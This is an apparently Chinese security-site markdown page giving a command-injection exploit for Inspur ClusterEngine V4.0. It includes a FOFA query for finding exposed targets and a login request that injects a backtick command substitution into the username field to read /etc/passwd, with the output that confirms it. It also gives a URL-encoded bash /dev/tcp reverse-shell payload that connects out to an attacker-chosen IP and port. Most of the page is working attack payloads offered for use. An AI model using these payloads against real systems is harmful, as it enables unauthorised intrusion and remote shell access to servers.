menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right zlsec chevron_right zlsec_info chevron_right document chevron_right 2021_Hvv chevron_right 浪潮 ClusterEngineV4.0 任意命令执行.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    浪潮 ClusterEngineV4.0 任意命令执行.md
    475 B / 2021-04-15 00:03:20
        ### 描述
    登录处抓包,然后闭合username字段重发引发报错
    fofa title="TSCEV4.0"
    
    ### POC & 利用
    ```
    # POC测试(出现 root:x:0:0 则存在漏洞)
    
    op=login&username=peiqi`$(cat /etc/passwd)`
    {"err":"/bin/sh: root:x:0:0:root:/root:/bin/bash: No such file or directory\n","exitcode":1,"out":"the user peiqi does not exist\nerror:1\n"}
    
    # 反弹shell
    op=login&username=peiqi`$(bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}}%2F{PORT}%200%3E%261)`
    ```
    
    
    links
    file_download